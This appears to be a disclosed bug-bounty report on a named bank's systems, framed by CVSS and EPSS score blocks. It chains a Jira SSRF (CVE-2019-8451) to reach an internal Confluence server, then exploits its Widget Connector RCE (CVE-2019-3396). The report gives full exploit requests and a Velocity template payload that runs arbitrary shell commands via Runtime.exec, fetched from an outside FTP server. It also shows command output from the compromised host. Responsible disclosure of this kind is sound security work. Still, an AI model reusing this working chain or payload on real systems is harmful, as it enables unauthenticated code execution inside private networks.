9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.975 High
EPSS
Percentile
100.0%
This report describes a combination of two separate vulnerabilities in two separate services. This chain of vulnerabilities allows unauthenticated attacker to run arbitrary code on a server inside the companyโs internal network.
Jira at https://jira.tochka.com is vulnerable to SSRF in the /plugins/servlet/gadgets/makeRequest resource - CVE-2019-8451.
Anyone on the internet can make it issue arbitrary HTTPS requests and read responses.
Moreover:
This allows an attacker to reach internal instance of Confluence https://confluence.bank24.int.
Confluence at https://confluence.bank24.int, uses a vulnerable version of a Widget Connector
plugin. This vulnerability leads to an RCE (CVE-2019-3396
).
There is an advisory by Atlassian. Also, there is a publicly known exploit to this vulnerability.
https://jira.tochka.com:[email protected]/
This bug could be used to send requests to an internal Confluence server https://confluence.bank24.int like so:
Request example:
POST /plugins/servlet/gadgets/makeRequest HTTP/1.1
Host: jira.tochka.com
User-Agent: curl/7.61.1
Accept: */*
X-Atlassian-Token: no-check
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
Connection: close
url=https://jira.tochka.com:[email protected]
Response snippet:
throw 1; < don't be evil' >{"https://jira.tochka.com:[email protected]":{"rc":200,"headers":{},"body":"<!DOCTYPE html>\n<html>\n<head>\n <title>ะ ะฐะฑะพัะธะน ััะพะป - Confluence<\/title>\n \n \n\n \n \n \n \n\n \n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=EDGE,chrome=IE7\">\n<meta charset=\"UTF-8\">\n<meta id=\"confluence-context-path\" name=\"confluence-context-path\" content=\"\">\n<meta id=\"confluence-base-url\" name=\"confluence-base-url\" content=\"https://confluence.bank24.int\">\n\n<meta id=\"atlassian-token\" name=\"atlassian-token\" content=\"f999fa99a5663c168e72b407eecdeec3695c70d0\">\n\n\n<script type=\"text/javascript\">\n var contextPath = '';\n<\/script>\n\n \n\n <meta name=\"confluence-request-time\" content=\"1571051898165\">\n \n \n \n <meta name=\"ajs-discovered-plugin-features\" content=\"$discoveredList\">\n <meta name=\"ajs-use-keyboard-shortcuts\" content=\"true\">\n <meta name=\"ajs-keyboardshortcut-hash\" content=\"97637bc20dfc7a1f15684630bc99897\">\n <meta id=\"team-calendars-has-jira-link\" content=\"true\">\n <meta name=\"ajs-team-calendars-display-time-format\" content=\"displayTimeFormat24\">\n <meta id=\"team-calendars-display-week-number\" content=\"false\">\n <meta
...
It looks that you have restrictions in place for outgoing HTTP and HTTPS requests, but not for FTP.
I set up an FTP server to serve a malicious template at ftp://68.183.67.159/qwe2.txt
File contents is:
#set ($exp="exp")
#set ($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($command))
#set ($input=$exp.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $exp.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($exp.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
$scan.next()
#end
3232
It takes command
parameter, executes corresponding command and returns the result back.
To trigger this chain of vulnerabilities execute following request:
POST /plugins/servlet/gadgets/makeRequest HTTP/1.1
Host: jira.tochka.com
User-Agent: curl/7.61.1
Accept: */*
X-Atlassian-Token: no-check
Content-Length: 322
Content-Type: application/x-www-form-urlencoded
Connection: close
url=https://jira.tochka.com:[email protected]/rest/tinymce/1/macro/preview&httpMethod=POST&headers=content-type%3Dapplication/json&postData={"contentId":"1","macro":{"body":"","params":{"url":"https://www.youtube.com/watch?v=y6sOtXOvchY","_template":"ftp://68.183.67.159/qwe2.txt","command":"id"},"name":"widget"}}
It makes Jira to send a macro preview request to the Confluence. Confluence then fetches a template from FTP server and executes id
command
Response snippet:
...
<div>\n uid=502(confluence) gid=502(confluence) groups=502(confluence) context=unconfined_u:system_r:initrc_t:s0\n\r\n3232\r\n\n <\/div>\n
...
You may change command
parameter to your liking.
Widget Connector
plugin version 3.1.4 or higher.This chain of vulnerabilities allows unauthenticated attacker to run arbitrary code on a server inside the companyโs internal network.
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.975 High
EPSS
Percentile
100.0%